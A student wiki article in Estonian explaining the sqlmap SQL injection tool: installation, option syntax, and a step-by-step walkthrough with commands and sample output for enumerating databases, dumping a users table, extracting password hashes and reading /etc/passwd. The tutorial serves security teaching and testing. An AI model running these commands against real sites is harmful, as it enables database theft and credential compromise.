Sqlmap

From ICO wiki
Jump to navigationJump to search

SQLmap

Autor: Elina Prudnikova

Rühm: A21

14.05.2015

Lühikirjeldus

SQLmap on avatud lähtekoodiga programm, mida kasutatakse SQL injektsiooni nõrkuste leidmiseks ja ärakasutamiseks, selleks et testida andmebaasiserverite turvalisust. [1]

SQLmap võimaldab näiteks: luua otseühendust andmebaasiga, alla laadida andmebaasi tabeleid, murda lihtsamaid paroole kasutades sõnastikupõhist rünnet, alla laadida või üles laadida faile andmebaasiserverist, käivitada käske andmebaasiserveris, eskaleerida kasutaja õigusi jne. [2]

Toetab mitmesuguseid andmebaasisüsteeme: MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB ja HSQLDB. [3]

NB! SQLmap'i kasutamine kellegi ründamiseks ilma mõlemapoolse nõusolekuta on kuritegu! Kasutajad võtavad täieliku vastutuse enda tegude eest ning programmi loojad ei vastuta võimaliku väärkasutuse või kahju eest!

Paigaldamine

SQLmap on operatsioonisüsteemist sõltumatu, kuna on kirjutatud keeles Python. Teda on võimalik kasutada nii Windowsis kui ka Linux/Unix all. [4]

Linux/Unix

SQLmap'i jaoks on kõigepealt vaja paigaldada Python 2.6 või 2.7 versioon.

1. Paigalda Python (Debian, Ubuntu).

sudo apt-get install python2.6

2. Kontrolli versiooni.

python --version

3. Seejärel alla laadida SQLmap.

wget from http://sqlmap.sourceforge.net/#download

4. Pakkida see lahti ja käivitada.

tar zxvf sqlmap-0.9.tar.gz

cd sqlmap

python sqlmap.py

5. Edukal paigaldamisel tagastab SQLmap:

sqlmap/0.9 - automatic SQL injection and database takeover tool
  http://sqlmap.sourceforge.net

Usage: python sqlmap.py [options]

sqlmap.py: error: missing a mandatory parameter ('-d', '-u', '-l', '-r', '-g', '-c', '--wizard' or '--update'), -h for help

Abi paigaldamisel Linux/Unix all

Windows

1. Alla laadida ja paigaldada Python 2.6 või 2.7 kodulehelt: Python

2. Alla laadida zip fail SQLmap'i kodulehelt, pakkida see lahti. SQLmap Käsurealt liikuda kataloogi, kuhu see lahti pakiti ja käivitada.

C:\sqlmapproject-sqlmap-2defc30>python ./sqlmap.py
Usage: ./sqlmap.py [options]

sqlmap.py: error: missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, --wiza
rd, --update, --purge-output or --dependencies), use -h for basic or -hh for adv
anced help

Press Enter to continue...

Abiks Windowsis paigaldamisel

Süntaks

Ülevaade SQLmap'i süntaksist. Käsu üldkuju:

python sqlmap.py [options]

Mõned võtmed:

1. Sihtmärk, kellega ühendutakse:

-d DIRECT      Otseühendus andmebaasiga
-u URL, --url=URL  Sihtmärgi URL (näiteks "www.target.com/vuln.php?id=1")

2. Päring, kuidas sihtmärgiga ühendutakse:

--data=DATA     Andmestring saadetakse läbi POST'i
--host=HOST     HTTP Host'i päis
--proxy=PROXY    Kasutada HTTP proxy't et ühenduda URL'iga
--delay=DELAY    Ooteaeg sekundites HTTP päringute vahel
--force-ssl     Kasuta SSL/HTTPS'i

3. Optimiseerimine:

--threads=THREADS  Samaaegsete HTTP(s) päringute arv (vaikimisi 1)

4. Andmebaas:

-a, --all      Tagasta kõik
--current-user   Tagasta hetkel kasutuses oleva kasutaja
--users       Loetle kasutajad
--passwords     Loetle kasutajate parooliräsid
--privileges    Loetle kasutajate privileegid
--roles       Loetle kasutajate rollid
--dbs        Loetle andmebaasid
--tables      Loetle andmebaasi tabelid
--columns      Loetle andmebaasi tabeli veerud
--schema      Loetle andmebaasi skeem
--dump       Väljasta kogu andmebaasi sisu
--dump-all     Väljasta kõikide andmebaaside sisu
--search      Otsi veergu, tabelit ja/või andmebaasi nime
-D DB        Mis andmebaasist loetleda
-T TBL       Mis andmebaasi tabelist loetleda
-C COL       Mis tabeli veerust loetleda
-U USER       Mis kasutaja kohta loetleda

5. Failid:

--file-read=RFILE  Loe fail süsteemist
--file-write=WFILE Kirjuta fail süsteemi
--file-dest=DFILE  Absoluutne failitee kuhu kirjutada

Lisaks on SQLmap'il veel väga palju muid võtmeid.

Kasutamine

Kuidas kontrollida, kas veebisait on nõrk SQL injektsiooni suhtes?[5]

Olgu lehe aadress:

http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15

Lisame URL'i lõpu märgi '. Nüüd on lehe URL:

http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15'

Kui leht tagastab SQL veateate, on see leht nõrk SQL injektsiooni suhtes.

Andmebaasid ja tabelid

1. Oletame, et tahame SQLmap'iga testida nõrka veebilehte. Veebilehega ühendumiseks kasutame võtit -u (URL).[6]

python sqlmap.py -u "http://www.site.com/section.php?id=51"

Näidisväljund, milles näha opsüsteem, veebiserveri ja andmebaasi tüüp koos versiooninumbriga:[7]

[*] starting at 12:10:33

[12:10:33] [INFO] resuming back-end DBMS 'mysql' 
[12:10:34] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
  Type: error-based
  Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  Payload: id=51 AND (SELECT 1489 FROM(SELECT COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0 END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
[12:10:37] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5

2. Kuna antud veebiserver on seega rünnatav, saab näiteks tagastada andmebaaside nimekirja, kasutades võtit --dbs:[8]

python sqlmap.py -u "http://www.sitemap.com/section.php?id=51" --dbs

Näidisväljund, mis näitab andmebaaside nimekirja:[9]

[*] starting at 12:12:56

[12:12:56] [INFO] resuming back-end DBMS 'mysql' 
[12:12:57] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
  Type: error-based
  Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  Payload: id=51 AND (SELECT 1489 FROM(SELECT COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0 END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
[12:13:00] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[12:13:00] [INFO] fetching database names
[12:13:00] [INFO] the SQL query used returns 2 entries
[12:13:00] [INFO] resumed: information_schema
[12:13:00] [INFO] resumed: safecosmetics
available databases [2]:
[*] information_schema
[*] safecosmetics

3. Leiame kõik tabelid, mis asuvad andmebaasis "safecosmetics":[10]

python sqlmap.py -u "http://www.site.com/section.php?id=51" --tables -D safecosmetics

Näidisväljund:[11]

[11:55:18] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[11:55:18] [INFO] fetching tables for database: 'safecosmetics'
[11:55:19] [INFO] heuristics detected web page charset 'ascii'
[11:55:19] [INFO] the SQL query used returns 216 entries
[11:55:20] [INFO] retrieved: acl_acl
[11:55:21] [INFO] retrieved: acl_acl_sections                                        
........... more tables

4. Leiame veerud tabelis "users" andmebaasis "safecosmetics":[12]

python sqlmap.py -u "http://www.site.com/section.php?id=51" --columns -D safecosmetics -T users

Näidisväljund:[13]

[12:17:39] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[12:17:39] [INFO] fetching columns for table 'users' in database 'safecosmetics'
[12:17:41] [INFO] heuristics detected web page charset 'ascii'
[12:17:41] [INFO] the SQL query used returns 8 entries
[12:17:42] [INFO] retrieved: id
[12:17:43] [INFO] retrieved: int(11)                                             
[12:17:45] [INFO] retrieved: name                                              
[12:17:46] [INFO] retrieved: text                                              
[12:17:47] [INFO] retrieved: password                                            
[12:17:48] [INFO] retrieved: text                                              

.......

[12:17:59] [INFO] retrieved: hash
[12:18:01] [INFO] retrieved: varchar(128)
Database: safecosmetics
Table: users
[8 columns]
+-------------------+--------------+
| Column      | Type     |
+-------------------+--------------+
| email       | text     |
| hash       | varchar(128) |
| id        | int(11)   |
| name       | text     |
| password     | text     |
| permission    | tinyint(4)  |
| system_allow_only | text     |
| system_home    | text     |
+-------------------+--------------+

5. Leiame eelnevast tabelist andmed:[14]

python sqlmap.py -u "http://www.site.com/section.php?id=51" --dump -D safecosmetics -T users

Näidisväljund, mis on sarnane mysqldump käsule:[15]

+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
| id | hash        | name   | email   | password | permission | system_home | system_allow_only |
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
| 1 | 5DIpzzDHFOwnCvPonu | admin   | <blank>  | <blank> | 3     | <blank>   | <blank>      |
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+

Kasutajad

1. Järgnev käsk tagastab infot kasutajate ja rollide kohta.[16]

python sqlmap.py -u "http://localhost/weak.php?id=10" --users --passwords --privileges --roles --threads=10

Näidisväljund:[17]

..........

database management system users [5]:
[*] ''@'localhost'
[*] ''@'localhost.localdomain'
[*] 'root'@'127.0.0.1'
[*] 'root'@'localhost'
[*] 'root'@'localhost.localdomain'

.............

database management system users password hashes:
[*] [1]:
  password hash: NULL
[*] root [2]:
  password hash: *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
  password hash: NULL

........

[*] %root% (administrator) [27]:
  privilege: ALTER
  privilege: ALTER ROUTINE
  privilege: CREATE
  privilege: CREATE ROUTINE
  privilege: CREATE TEMPORARY TABLES
  privilege: CREATE USER
  privilege: CREATE VIEW
  privilege: DELETE
  privilege: DROP
  privilege: EVENT
  privilege: EXECUTE
  privilege: FILE
  privilege: INDEX
  privilege: INSERT
  privilege: LOCK TABLES
  privilege: PROCESS
  privilege: REFERENCES
  privilege: RELOAD
  privilege: REPLICATION CLIENT
  privilege: REPLICATION SLAVE
  privilege: SELECT
  privilege: SHOW DATABASES
  privilege: SHOW VIEW
  privilege: SHUTDOWN
  privilege: SUPER
  privilege: TRIGGER
  privilege: UPDATE

2. Leiame info hetkel kasutusel oleva kasutaja, andmebaasi ja hostinime kohta:[18]

python sqlmap.py -u "http://localhost/weak.php?id=10" --current-user --is-dba --current-db --hostname --threads=10

Näidisväljund:[19]

........
[11:32:33] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Red Hat Enterprise 6 (Santiago)
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0.11
[11:32:33] [INFO] fetching current user
[11:32:33] [INFO] retrieving the length of query output
[11:32:33] [INFO] retrieved: 14
[11:32:38] [INFO] retrieved: root@localhost       
current user:  'root@localhost'
[11:32:38] [INFO] fetching current database
[11:32:38] [INFO] retrieving the length of query output
[11:32:38] [INFO] retrieved: 5
[11:32:40] [INFO] resumed: profile_data
current database:  'profile_data'
[11:32:40] [INFO] fetching server hostname
[11:32:40] [INFO] retrieving the length of query output
[11:32:40] [INFO] retrieved: 21
[11:32:48] [INFO] retrieved: localhost.localdomain       
hostname:  'localhost.localdomain'
[11:32:48] [INFO] testing if current user is DBA
[11:32:48] [INFO] fetching current user
current user is DBA:  False

3. Leiame kasutaja parooliräsi:[20]

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_password --dump

Näidisväljund:[21]

[10:59:15] [INFO] the SQL query used returns 1 entries
[10:59:17] [INFO] retrieved: 24iYBc17xK0e.
[10:59:18] [INFO] analyzing table dump for possible password hashes
Database: sqldummywebsite
Table: user_info
[1 entry]
+---------------+
| user_password |
+---------------+
| 24iYBc17xK0e. |
+---------------+

Failid

1. Faili lugemine kui on olemas vajalikud õigused, näiteks /etc/passwd:[22]

python sqlmap.py -u "http://localhost/weak.php?id=10" --file-read=/etc/passwd --threads=10

Kokkuvõte

SQLmap on väärtuslik töörist, selleks et mugavalt testida oma süsteemi SQL injektsioonide suhtes ja leida üles olemasolevad nõrkused. Teda on võimalik seadistada vastavalt enda vajadustele ja toetab paljusid andmebaasisüsteeme. Lisaks on ta kasutatav nii Windowsi kui Linux/Unix all.

Kasutatud kirjandus

Binarytides

Binarytides

Hackertarget

SQLmap Usage

SQLmap Features

Darkmoreops